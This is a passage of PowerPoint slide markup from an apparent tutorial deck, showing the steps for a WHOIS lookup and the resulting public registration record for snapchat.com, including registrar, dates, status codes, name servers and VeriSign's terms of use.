              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="721217" y="1389602"/>
            <a:ext cx="11586762" cy="38856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63480" rIns="91440" bIns="12696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Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>clientDeleteProhibited</a:t>
            </a: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https://icann.org/epp#clientDeleteProhibited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Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>clientTransferProhibited</a:t>
            </a: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https://icann.org/epp#clientTransferProhibited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Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>clientUpdateProhibited</a:t>
            </a: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https://icann.org/epp#clientUpdateProhibited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Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serverDeleteProhibited</a:t>
            </a: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https://icann.org/epp#serverDeleteProhibited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Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serverTransferProhibited</a:t>
            </a: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https://icann.org/epp#serverTransferProhibited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Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serverUpdateProhibited</a:t>
            </a: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https://icann.org/epp#serverUpdateProhibited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Name Server: NS-1468.AWSDNS-55.ORG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Name Server: NS-1892.AWSDNS-44.CO.UK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Name Server: NS-220.AWSDNS-27.COM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Name Server: NS-530.AWSDNS-02.NET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DNSSEC: unsigned   URL of the ICANN </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Whois</a:t>
            </a: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Inaccuracy Complaint Form: https://www.icann.org/wicf/&gt;&gt;&gt;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Last update of </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a: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database: 2023-07-22T07:12:53Z &lt;&lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25815227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A0324EF-04E9-4476-8D1C-E552AE478027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1754825" y="117693"/>
            <a:ext cx="10055102" cy="6740307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -6 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> redirects to new tab </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -7</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Paste the domain name </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step -8</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Domain Name: SNAPCHAT.COM</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registry Domain ID: 1704543145_DOMAIN_COM-VRSN</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registrar WHOIS Server: whois.markmonitor.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registrar URL: http://www.markmonitor.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Updated Date: 2018-03-28T20:34:03Z</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Creation Date: 2012-02-28T19:29:26Z</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registry Expiry Date: 2026-02-28T19:29:26Z</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registrar: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>MarkMonitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> Inc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registrar IANA ID: 292</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registrar Abuse Contact Email: abusecomplaints@markmonitor.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registrar Abuse Contact Phone: +1.2086851750</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>clientDeleteProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> https://icann.org/epp#clientDeleteProhibited</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>clientTransferProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> https://icann.org/epp#clientTransferProhibited</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>clientUpdateProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> https://icann.org/epp#clientUpdateProhibited</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>serverDeleteProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> https://icann.org/epp#serverDeleteProhibited</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>serverTransferProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> https://icann.org/epp#serverTransferProhibited</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2910050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A4B4B30-7B0F-4AA7-8928-9857EC93E3D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E3CD50-825A-47C4-B12C-7733CC52FE9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2061704" y="246221"/>
            <a:ext cx="8835991" cy="6463308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Domain Status: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>serverUpdateProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> https://icann.org/epp#serverUpdateProhibited</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Name Server: NS-1468.AWSDNS-55.ORG</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Name Server: NS-1892.AWSDNS-44.CO.UK</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Name Server: NS-220.AWSDNS-27.COM</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Name Server: NS-530.AWSDNS-02.NET</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>DNSSEC: unsigned</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>URL of the ICANN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> Inaccuracy Complaint Form: https://www.icann.org/wicf/</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; Last update of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> database: 2023-07-22T07:18:39Z &lt;&lt;&lt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>For more information on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> status codes, please visit https://icann.org/epp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>NOTICE: The expiration date displayed in this record is the date the</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>registrar's sponsorship of the domain name registration in the registry is</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>currently set to expire. This date does not necessarily reflect the expiration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>date of the domain name registrant's agreement with the sponsoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>registrar. Users may consult the sponsoring registrar's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> database to</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>view the registrar's reported date of expiration for this registration.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>TERMS OF USE: You are not authorized to access or query our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>database through the use of electronic processes that are high-volume and</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>automated except as reasonably necessary to register domain names or</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>modify existing registrations; the Data in VeriSign Global Registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Services' ("VeriSign") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> database is provided by VeriSign for</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>information purposes only, and to assist persons in obtaining information</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>about or related to a domain name registration record. VeriSign does not</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>guarantee its accuracy. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10548010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D650C73-1A61-4551-B767-EB5643C6AF28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2655216" y="505677"/>
            <a:ext cx="7197121" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>By submitting a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> query, you agree to abide</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>by the following terms of use: You agree that you may use this Data only</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>for lawful purposes and that under no circumstances will you use this Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>to: (1) allow, enable, or otherwise support the transmission of mass</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>unsolicited, commercial advertising or solicitations via e-mail, telephone,</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>or facsimile; or (2) enable high volume, automated, electronic processes</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>that apply to VeriSign (or its computer systems). The compilation,</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>repackaging, dissemination or other use of this Data is expressly</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>prohibited without the prior written consent of VeriSign. You agree not to</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>use electronic processes that are automated and high-volume to access or</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>query the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> database except as reasonably necessary to register</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>domain names or modify existing registrations. VeriSign reserves the right</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>to restrict your access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> database in its sole discretion to ensure</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>operational stability. VeriSign may restrict or terminate your access to the</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> database for failure to abide by these terms of use. VeriSign</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>reserves the right to modify these terms at any time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>The Registry database contains ONLY .COM, .NET, .EDU domains and</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Registrars.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252528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C038426-C961-406B-88F3-4EC56238C390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041583" y="199752"/>
            <a:ext cx="6102416" cy="6370975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>                               Day-1 </a:t>
            </a:r>
